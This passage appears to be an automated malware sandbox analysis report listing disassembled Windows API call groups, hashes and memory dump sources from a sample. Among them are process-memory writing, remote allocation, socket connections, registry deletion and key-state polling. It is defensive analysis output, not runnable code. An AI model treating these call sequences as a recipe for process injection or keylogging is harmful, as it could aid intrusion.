                                                                          • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                          Similarity
                                                                          • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 3539004672-0
                                                                          APIs
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                          • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                          • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                          • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                          Similarity
                                                                          • API ID: Interlocked$DecrementIncrement$Sleep
                                                                          • String ID:
                                                                          • API String ID: 327565842-0
                                                                          APIs
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                          • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                          • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                          Similarity
                                                                          • API ID: PrivateProfile$SectionWrite$String
                                                                          • String ID:
                                                                          • API String ID: 2832842796-0
                                                                          APIs
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                          • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                          • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                          Similarity
                                                                          • API ID: Enum$CloseDeleteOpen
                                                                          • String ID:
                                                                          • API String ID: 2095303065-0
                                                                          APIs
                                                                          • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                          Similarity
                                                                          • API ID: RectWindow
                                                                          • String ID:
                                                                          • API String ID: 861336768-0
                                                                          APIs
                                                                          • SendMessageW.USER32 ref: 00449598
                                                                            • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                          • _wcslen.LIBCMT ref: 0044960D
                                                                          • _wcslen.LIBCMT ref: 0044961A
                                                                          • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                          Similarity
                                                                          • API ID: MessageSend$_wcslen$_wcspbrk
                                                                          • String ID:
                                                                          • API String ID: 1856069659-0
                                                                          APIs
                                                                          • GetCursorPos.USER32(?), ref: 004478E2
                                                                          • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                          • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                          • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                          • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                                                          Similarity
                                                                          • API ID: CursorMenuPopupTrack$Proc
                                                                          • String ID:
                                                                          • API String ID: 1300944170-0
                                                                          APIs
                                                                          • GetClientRect.USER32(?,?), ref: 004479CC
                                                                          • GetCursorPos.USER32(?), ref: 004479D7
                                                                          • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                          • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                          • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                          Similarity
                                                                          • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                          • String ID:
                                                                          • API String ID: 1822080540-0
                                                                          • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                          • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                          • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                          • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
APIs
• GetWindowRect.USER32(?,?), ref: 00447C5D
• ScreenToClient.USER32(?,?), ref: 00447C7B
• SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
• EndPaint.USER32(?,?), ref: 00447D13
Similarity
• API ID: ClientPaintRectRectangleScreenViewportWindow
• String ID:
• API String ID: 659298297-0
APIs
• EnableWindow.USER32(?,00000000), ref: 00448B5C
• EnableWindow.USER32(?,00000001), ref: 00448B72
• ShowWindow.USER32(?,00000000), ref: 00448BE8
• ShowWindow.USER32(?,00000004), ref: 00448BF4
• EnableWindow.USER32(?,00000001), ref: 00448C09
  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
  • Part of subcall function 00440D98: SendMessageW.USER32(009C1AC0,000000F1,00000000,00000000), ref: 00440E6E
  • Part of subcall function 00440D98: SendMessageW.USER32(009C1AC0,000000F1,00000001,00000000), ref: 00440E9A
Similarity
• API ID: Window$EnableMessageSend$LongShow
• String ID:
• API String ID: 142311417-0
APIs
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
• String ID:
• API String ID: 3087257052-0
APIs
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• WSAGetLastError.WSOCK32(00000000), ref: 0046540D
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
• WSAGetLastError.WSOCK32(00000000), ref: 0046546D
• closesocket.WSOCK32(00000000,00000000), ref: 00465481
Similarity
• API ID: ErrorLast$closesocketconnectinet_addrsocket
• String ID:
• API String ID: 245547762-0
APIs
• DeleteObject.GDI32(00000000), ref: 004471D8
• ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
• SelectObject.GDI32(?,00000000), ref: 00447228
• BeginPath.GDI32(?), ref: 0044723D
• SelectObject.GDI32(?,00000000), ref: 00447266
Similarity
• API ID: Object$Select$BeginCreateDeletePath
• String ID:
• API String ID: 2338827641-0
APIs
• Sleep.KERNEL32(00000000), ref: 00434598
• QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
• Sleep.KERNEL32(00000000), ref: 004345D4
• QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
APIs
Similarity
• API ID: Destroy$DeleteObjectWindow$Icon
• String ID:
• API String ID: 4023252218-0
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                          • String ID:
                                                                          • API String ID: 1489400265-0
                                                                          • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                          • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                          • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                          • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                          APIs
                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                          • DestroyWindow.USER32(?), ref: 00455728
                                                                          • DeleteObject.GDI32(?), ref: 00455736
                                                                          • DeleteObject.GDI32(?), ref: 00455744
                                                                          • DestroyIcon.USER32(?), ref: 00455752
                                                                          • DestroyWindow.USER32(?), ref: 00455760
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                          • String ID:
                                                                          • API String ID: 1042038666-0
                                                                          • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                          • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                          • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                          • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                          • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                          • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                          • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                          APIs
                                                                          • __getptd.LIBCMT ref: 0041780F
                                                                            • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                            • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                          • __getptd.LIBCMT ref: 00417826
                                                                          • __amsg_exit.LIBCMT ref: 00417834
                                                                          • __lock.LIBCMT ref: 00417844
                                                                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                          • String ID:
                                                                          • API String ID: 938513278-0
                                                                          • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                          • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                          • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                          • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                          APIs
                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                          • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                          • ExitThread.KERNEL32 ref: 00413D4E
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                          • __freefls@4.LIBCMT ref: 00413D74
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                          • String ID:
                                                                          • API String ID: 2403457894-0
                                                                          • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                          • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                          • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                          • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                          APIs
                                                                            • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                          • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                            • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                            • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                          • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                            • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                          • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                          • ExitThread.KERNEL32 ref: 004151ED
                                                                          • __freefls@4.LIBCMT ref: 00415209
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                          • String ID:
                                                                          • API String ID: 4247068974-0
                                                                          • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                          • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                          • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                          • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: 5$8$^
                                                                          • API String ID: 0-3622883839
                                                                          • Opcode ID: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                                          • Instruction ID: 6ee989b57c56cc683e8081b45a60e8d88641feefa2b309a8211b066407c3f2e5
                                                                          • Opcode Fuzzy Hash: 5b0bf54134f80cff9ca6ce4a8dff4b23300e7e002ba4f74be1d0103a91d53083
                                                                          • Instruction Fuzzy Hash: 82F1B4B1D00649AACB24CFA9C940AEEFBF4EF84300F14856FE455E7351E3B89A45CB56
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: )$U$\
                                                                          • API String ID: 0-3705770531
                                                                          • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                          • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                          • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                          • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                          APIs
                                                                            • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                          • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                          • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                          • CoUninitialize.OLE32 ref: 0046E53D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
• Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
• Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
Strings
• \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
• String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
• API String ID: 708495834-557222456
• Opcode ID: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
• Instruction ID: 9c514e09f8cb76db8ae150367893d7536957bb5c5403f45e3580b17af89e858a
• Opcode Fuzzy Hash: 0835c6591df01f69715f5e8aca6b92cd03353c77de4b2b2244ddd74c7a14709d
• Instruction Fuzzy Hash: 7C917F711087009FC310EF65C88186BB7E8AF89314F148D2FF595672A2E778E919CB9B
APIs
  • Part of subcall function 00434319: WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043434A
• SendMessageW.USER32(?,00001104,00000000,00000000), ref: 004365EF
  • Part of subcall function 004342DD: ReadProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 0043430E
  • Part of subcall function 004343AD: GetWindowThreadProcessId.USER32(?,?), ref: 004343E0
  • Part of subcall function 004343AD: OpenProcess.KERNEL32(00000438,00000000,?), ref: 004343F1
  • Part of subcall function 004343AD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004), ref: 00434408
• SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0043665F
• SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 004366DF
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
• Instruction ID: 60a9f40d71a87185ad744a771aacdfc79ad0a16393efc777ae91d2f205fac39b
• Opcode Fuzzy Hash: 6104cbe5d4ae3c4c99a3306f76968d572a7f9f5d55716afa725ed0ba86ca2a2d
• Instruction Fuzzy Hash: 0D51B972A00218ABCB10DFA5DD42FDEB778EFC9304F00459AFA05EB180D6B4BA45CB65
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
Similarity
• API ID: _memmove
• String ID: \$]$h
• API String ID: 4104443479-3262404753
• Opcode ID: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
• Instruction ID: f8aecd1968ad4f88b1990a67d2c0a139cd5c037738d7fdf96801fcbc28408ccb
• Opcode Fuzzy Hash: 176a597a96dcd2a70b70cc410daef71b144e937b03d0c11d284d361abdce2453
• Instruction Fuzzy Hash: 97518470E00209DFDF18CFA5C980AAEB7F2BF85304F29826AD405AB355D7385D45CB55
APIs
• ShellExecuteExW.SHELL32(0000003C), ref: 00457D67
  • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
  • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
• CloseHandle.KERNEL32(?), ref: 00457E09
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
